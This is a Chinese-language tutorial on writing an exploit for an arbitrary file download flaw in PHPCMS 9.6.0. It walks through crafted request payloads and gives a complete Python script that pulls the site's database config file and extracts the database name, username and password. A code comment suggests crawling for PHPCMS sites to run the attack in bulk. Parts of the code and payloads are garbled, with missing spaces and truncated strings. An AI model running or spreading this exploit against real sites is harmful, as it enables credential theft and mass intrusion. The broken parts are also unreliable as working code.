前言:
此刻我们对“php任意文件”大体比较着重,我们都需要剖析一些“php任意文件”的相关知识。那么小编在网络上搜集了一些对于“php任意文件””的相关内容,希望朋友们能喜欢,你们快快来学习一下吧!原创: Free雅轩 合天智汇
前言
学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp
实验工具:firefox,burp,phpcms9.6.0
实验语言:Python3.4
实验环境:php+mysql+apache
首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤
这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后再来实际复现一遍。
漏洞复现流程就是按照我们下方的每一步链接走下去!
01
第一步
我们先来获取phpcms/modules/wap/index.php中的cookie值
;c=index&a=init&siteid=1
02
第二步
修改标红部分的文件即为自己想要下载的文件,这里标红部分就是你想要下载的内部文件。也就是在第二部构造我们的下载链接。对应的是构造的payload
;c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%2%2*70
03
第三步
访问该链接得到_att_json值
;c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%252%2]index.ph... h&f=p%3%252%2*70C
04
第四步
通过获取到的_att_json值来构造下载payload
05
第五步
通过增加json值认证去访问构造好的下载链接。将get请求中的a_k参数值替换成获取到的_att_json值,并且请求即可。这里后面的标红部分就是获取到的_att_json值
最后点击“点击下载”按钮,即可下载/caches/configs/database.php文件
exp编写
漏洞复现流程走完之后我们就要来按照漏洞复现流程进行编写我们的exp:
#-*-coding=utf-8 -*-
#author = Free雅轩
importrequests
#导入requests模块,模拟爬取访问网页
importre
#导入re正则模块,对网页中我们所需的内容进行匹配
fromurllib.parse import quote
#从urllib.parse模块中导入quote方法,用于对传递进来的url进行编码re
TIMEOUT= 3
#设置网页响应超时时间为3秒
url= r''
#定义URL地址
#这里其实是可以利用采集工具/模拟引擎来进行爬取PHPCMS的关键字来进行批量读取/验证操作
payload=r'&id=1&m=1&f=caches/configs/database.ph%3C&modelid=1&catid=1&s=&i=1&d=1&'
#定义漏洞利用payload
cookies= {}
#设置cookie
#步骤一 获取cookie
step1= '{}/index.php?m=wap&c=index&a=init&siteid=1/'.format(url)
print('step1:{}'.format(step1))
#模拟人工操作构造第一个payload
response1_cookies= requests.get(step1 , timeout=3).cookies
#将第一步的url和cookies结合并赋值给response_cookies,设置url响应超时时间为3秒
fori in response1_cookies:
print(i)
if i.name[-7:] == '_siteid':
cookies_head = i.name[:6]
cookies[cookies_head + '_userid' ] = i.value
cookies[i.name] = i.value
print(cookies)
#步骤二 获取_att_json
step2='{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}'.format(url, quote(payload))
print('step2:{}'.format(step2))
response2_cookies= requests.get(step2 , timeout=3 , cookies=cookies).cookies
forj in response2_cookies:
if j.name[-9:] == '_att_json':
enc_payload = j.value
#步骤三 获取构造下载链接
step3= '{}/index.php?m=content&c=down&a_k={}'.format(url,enc_payload)
print('step3:{}'.format(step3))
#步骤四 利用requests模块中的text方法将网页输出,将获取到的链接中的db,username,password等重要信息匹配出来
step4= requests.get(step3 , timeout=3 , cookies=cookies).text
file= re.findall(r'<a href="(.+?)"',step4)[0]
downfile_url= '{}/index.php{}'.format(url, file)
print(downfile_url)
ret= requests.get(downfile_url).text
print(ret)
re_db= r"'database' => '([\S]+)'"
re_username= r"'username' => '([\S]+)'"
re_password= r"'password' => '([\S]+)'"
db =re.search(re_db, ret).group(1)
username= re.search(re_username, ret).group(1)
password= re.search(re_password, ret).group(1)
print(db,username, password)
exp利用
(注:本文属于合天原创投稿奖励,未经允许,禁止转载!)
标签: #php任意文件 #php任意文件下载漏洞 #phpswfupload